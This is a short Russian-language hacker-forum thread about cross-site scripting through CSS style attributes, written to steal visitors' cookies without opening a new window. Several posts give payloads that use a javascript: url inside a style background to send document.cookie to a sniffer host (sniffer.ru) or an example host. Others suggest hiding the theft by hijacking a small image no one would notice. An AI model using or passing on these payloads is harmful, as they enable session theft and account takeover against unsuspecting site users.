xss в стилях
 

вот как реализовать такое:
нужно не выходя из тега, к примеру: <img ......>
передать нужному скрипту кукисы.
т.е. http://example/?document.cookie
!И НЕ ОТКРЫВАТЬ НОВОЕ ОКНО!

<img src="http://example/?"+document.cookie>

если ты имеешь ввиду не выходя за кавычку, то так не получится

не... в стилях
style="здеся"

я имею введу за '>'

KEZ, ты ничего не путаешь?

<img src="http://sasa" style="background:black url(javascript:document.images[0].src='http://sniffer.ru/snif.gif?'+document.cookie)">

В этом случае самая первая картинка изуродуеется в снифер. Обойти так:
1)либо написать скриптик, котрый создаст новую картинку
2)либо сниффер сделать ввиде той картинки, которая заменится
3)либо выбрать просто не [0] а какуюнить маленькую картинку в теле документа, пропажи/подмены которой не заметно.

конечно путаю, я заголовок не прочитал

style=background:url(javascript:i=new Image();i.src='http://example/?'+document.cookie)

можно как Zadoxlik сказал, но не факт что на странице будет images[0]

Аналогичная тема:
http://forum.antichat.ru/showthread.php?t=6829
Ссылка по теме:
http://antichat.ru/crackchat/HTML
Тогда на странице вообще не будет изображений, т.к. первое изображение в хтмл-документе получает 0... А смысл, который подразумевал задохлик как раз в динамической подмене изображения (с помощью скриптовой инъекции)...

Kez, я имел ввиду, то что, не кажется ли тебе что твой вариант вообще не сработает?

ЗЫ: изображение палюбэ будет, т.к. мы прописываем энто все в теге имг. Даже если б не было (скажем тег был бы не имг), я написал как пример, что в этом же коде, можно создать изображение.

кажется

фишка в том что я вообще не въехал про что тут тема...
извините за тупые ответы

это не работает
наверное в стилях нельзя так. потому как
работает на ура

и еще... больше надо в теге <font style=...>
нежели в <img ....> :-\